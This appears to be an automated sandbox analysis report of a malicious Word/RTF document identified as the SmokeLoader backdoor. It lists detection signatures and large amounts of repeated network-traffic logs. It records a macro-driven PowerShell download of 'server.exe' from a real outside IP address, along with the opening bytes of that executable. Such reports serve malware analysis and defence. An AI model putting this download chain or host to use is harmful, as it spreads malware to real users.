Windows Analysis Report
472.rtf.doc

Overview

General Information

Sample name: 472.rtf.doc
renamed because original name is a hash value
Original sample name: 472.rtf.doc
Analysis ID: 1446716
MD5: 0bd1328012301d04bdc921acb321b820
SHA1: 724612a3c88f187aa000efe4ff4e9e04c9553696
SHA256: 7be9ef61632edc0f2fc6ad59d64ad69dbffbd05013a80ab1dfbb6bd8a6090b66
Tags: docDofoilrtfSmokeLoader
Infos:

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Yara detected SmokeLoader
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Drops PE files with benign system names
Encrypted powershell cmdline option found
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: System File Execution Location Anomaly
Suspicious command line found
Suspicious powershell command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
SmokeLoader The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
 https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Avira: detection malicious, Label: TR/Crypt.Agent.mvien
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost.exe ReversingLabs: Detection: 91%
Multi AV Scanner detection for submitted file
Source: 472.rtf.doc ReversingLabs: Detection: 26%
Machine Learning detection for sample
Source: 472.rtf.doc Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 23 May 2024 18:15:11 GMTServer: Apache/2.4.38 (Debian)Last-Modified: Tue, 21 May 2024 06:39:08 GMTETag: "2d000-618f1132a7b00"Accept-Ranges: bytesContent-Length: 184320Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 af 24 42 6c eb 45 2c 3f eb 45 2c 3f eb 45 2c 3f 56 0a ba 3f ea 45 2c 3f f5 17 a8 3f f4 45 2c 3f f5 17 b9 3f fb 45 2c 3f f5 17 af 3f 89 45 2c 3f cc 83 57 3f ec 45 2c 3f eb 45 2d 3f 86 45 2c 3f f5 17 a6 3f ea 45 2c 3f f5 17 b8 3f ea 45 2c 3f f5 17 bd 3f ea 45 2c 3f 52 69 63 68 eb 45 2c 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 98 09 4a 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 90 00 00 00 2c f4 01 00 00 00 00 f7 15 00 00 00 10 00 00 00 a0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 f4 01 00 04 00 00 c9 24 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 01 02 00 50 00 00 00 00 e0 f3 01 d0 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b6 8f 00 00 00 10 00 00 00 90 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 66 6a 01 00 00 a0 00 00 00 6c 01 00 00 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 5c c6 f1 01 00 10 02 00 00 2e 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 a0 00 00 00 e0 f3 01 00 a2 00 00 00 2e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /download_22/server.exe HTTP/1.1Host: 45.84.0.173Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
